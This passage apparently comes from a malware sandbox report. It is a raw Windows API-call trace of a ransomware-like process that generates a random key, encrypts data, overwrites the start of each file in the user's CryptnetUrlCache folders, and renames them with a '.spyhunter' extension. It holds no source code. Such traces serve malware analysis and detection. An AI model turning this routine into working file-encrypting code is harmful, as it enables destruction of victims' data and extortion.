(in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee30 | out: pbBuffer=0x248ee30) returned 1 [0151.855] GetProcessHeap () returned 0x2c0000 [0151.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee28*=0x30) returned 1 [0151.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0151.882] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".txt") returned 0x0 [0151.883] GetProcessHeap () returned 0x2c0000 [0151.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.883] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edec*=0x100, lpOverlapped=0x0) returned 1 [0151.883] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.883] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edec*=0x100, lpOverlapped=0x0) returned 1 [0151.883] GetProcessHeap () returned 0x2c0000 [0151.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.884] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.884] WriteFile (in: hFile=0x178, lpBuffer=0x248ee2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x248ee2c*, lpNumberOfBytesWritten=0x248edec*=0x4, lpOverlapped=0x0) returned 1 [0151.884] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edec*=0x30, lpOverlapped=0x0) returned 1 [0151.884] CloseHandle (hObject=0x178) returned 1 [0151.884] GetProcessHeap () returned 0x2c0000 [0151.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.884] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.spyhunter") returned 129 [0151.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.spyhunter")) returned 1 [0151.885] GetProcessHeap () returned 0x2c0000 [0151.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.885] GetProcessHeap () returned 0x2c0000 [0151.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.885] GetProcessHeap () returned 0x2c0000 [0151.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8020 | out: hHeap=0x2c0000) returned 1 [0151.885] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee30 | out: pbBuffer=0x248ee30) returned 1 [0151.885] GetProcessHeap () returned 0x2c0000 [0151.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.885] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee28*=0x30) returned 1 [0151.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0151.886] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0151.886] GetProcessHeap () returned 0x2c0000 [0151.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.886] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248edec*=0x194, lpOverlapped=0x0) returned 1 [0151.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.886] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248edec*=0x194, lpOverlapped=0x0) returned 1 [0151.887] GetProcessHeap () returned 0x2c0000 [0151.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.887] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.887] WriteFile (in: hFile=0x178, lpBuffer=0x248ee2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x248ee2c*, lpNumberOfBytesWritten=0x248edec*=0x4, lpOverlapped=0x0) returned 1 [0151.887] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edec*=0x30, lpOverlapped=0x0) returned 1 [0151.887] CloseHandle (hObject=0x178) returned 1 [0151.887] GetProcessHeap () returned 0x2c0000 [0151.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.887] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.spyhunter") returned 162 [0151.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.spyhunter")) returned 1 [0151.888] GetProcessHeap () returned 0x2c0000 [0151.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.888] GetProcessHeap () returned 0x2c0000 [0151.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.888] GetProcessHeap () returned 0x2c0000 [0151.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f236d0 | out: hHeap=0x2c0000) returned 1 [0151.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee28 | out: pbBuffer=0x248ee28) returned 1 [0151.889] GetProcessHeap () returned 0x2c0000 [0151.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee20*=0x30) returned 1 [0151.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0151.891] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") returned 0x0 [0151.891] GetProcessHeap () returned 0x2c0000 [0151.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.891] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ede4*=0x1ae, lpOverlapped=0x0) returned 1 [0151.892] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.892] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ede4*=0x1ae, lpOverlapped=0x0) returned 1 [0151.892] GetProcessHeap () returned 0x2c0000 [0151.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.892] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.892] WriteFile (in: hFile=0x178, lpBuffer=0x248ee24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x248ee24*, lpNumberOfBytesWritten=0x248ede4*=0x4, lpOverlapped=0x0) returned 1 [0151.892] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ede4*=0x30, lpOverlapped=0x0) returned 1 [0151.892] CloseHandle (hObject=0x178) returned 1 [0151.893] GetProcessHeap () returned 0x2c0000 [0151.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.893] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.spyhunter") returned 162 [0151.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.spyhunter")) returned 1 [0152.185] GetProcessHeap () returned 0x2c0000 [0152.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.185] GetProcessHeap () returned 0x2c0000 [0152.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.185] GetProcessHeap () returned 0x2c0000 [0152.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23548 | out: hHeap=0x2c0000) returned 1 [0152.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee28 | out: pbBuffer=0x248ee28) returned 1 [0152.186] GetProcessHeap () returned 0x2c0000 [0152.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.186] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee20*=0x30) returned 1 [0152.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0152.187] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0152.187] GetProcessHeap () returned 0x2c0000 [0152.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.187] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248ede4*=0x663, lpOverlapped=0x0) returned 1 [0152.207] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff99d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.207] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248ede4*=0x663, lpOverlapped=0x0) returned 1 [0152.207] GetProcessHeap () returned 0x2c0000 [0152.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.208] WriteFile (in: hFile=0x178, lpBuffer=0x248ee24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x248ee24*, lpNumberOfBytesWritten=0x248ede4*=0x4, lpOverlapped=0x0) returned 1 [0152.212] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ede4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ede4*=0x30, lpOverlapped=0x0) returned 1 [0152.235] CloseHandle (hObject=0x178) returned 1 [0152.236] GetProcessHeap () returned 0x2c0000 [0152.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.236] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.spyhunter") returned 161 [0152.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.spyhunter")) returned 1 [0152.237] GetProcessHeap () returned 0x2c0000 [0152.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.237] GetProcessHeap () returned 0x2c0000 [0152.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.237] GetProcessHeap () returned 0x2c0000 [0152.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe77e0 | out: hHeap=0x2c0000) returned 1 [0152.237] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee20 | out: pbBuffer=0x248ee20) returned 1 [0152.238] GetProcessHeap () returned 0x2c0000 [0152.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee18*=0x30) returned 1 [0152.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0152.239] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0152.239] GetProcessHeap () returned 0x2c0000 [0152.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.239] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248eddc*=0x5ae, lpOverlapped=0x0) returned 1 [0152.251] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.251] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248eddc*=0x5ae, lpOverlapped=0x0) returned 1 [0152.251] GetProcessHeap () returned 0x2c0000 [0152.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.251] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.251] WriteFile (in: hFile=0x178, lpBuffer=0x248ee1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x248ee1c*, lpNumberOfBytesWritten=0x248eddc*=0x4, lpOverlapped=0x0) returned 1 [0152.251] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eddc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eddc*=0x30, lpOverlapped=0x0) returned 1 [0152.252] CloseHandle (hObject=0x178) returned 1 [0152.252] GetProcessHeap () returned 0x2c0000 [0152.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.252] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.spyhunter") returned 161 [0152.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.spyhunter")) returned 1 [0152.254] GetProcessHeap () returned 0x2c0000 [0152.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.254] GetProcessHeap () returned 0x2c0000 [0152.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0152.255] GetProcessHeap () returned 0x2c0000 [0152.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7668 | out: hHeap=0x2c0000) returned 1 [0152.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee20 | out: pbBuffer=0x248ee20) returned 1 [0152.255] GetProcessHeap () returned 0x2c0000 [0152.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0152.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee18*=0x30) returned 1 [0152.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.256] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0152.256] StrStrW 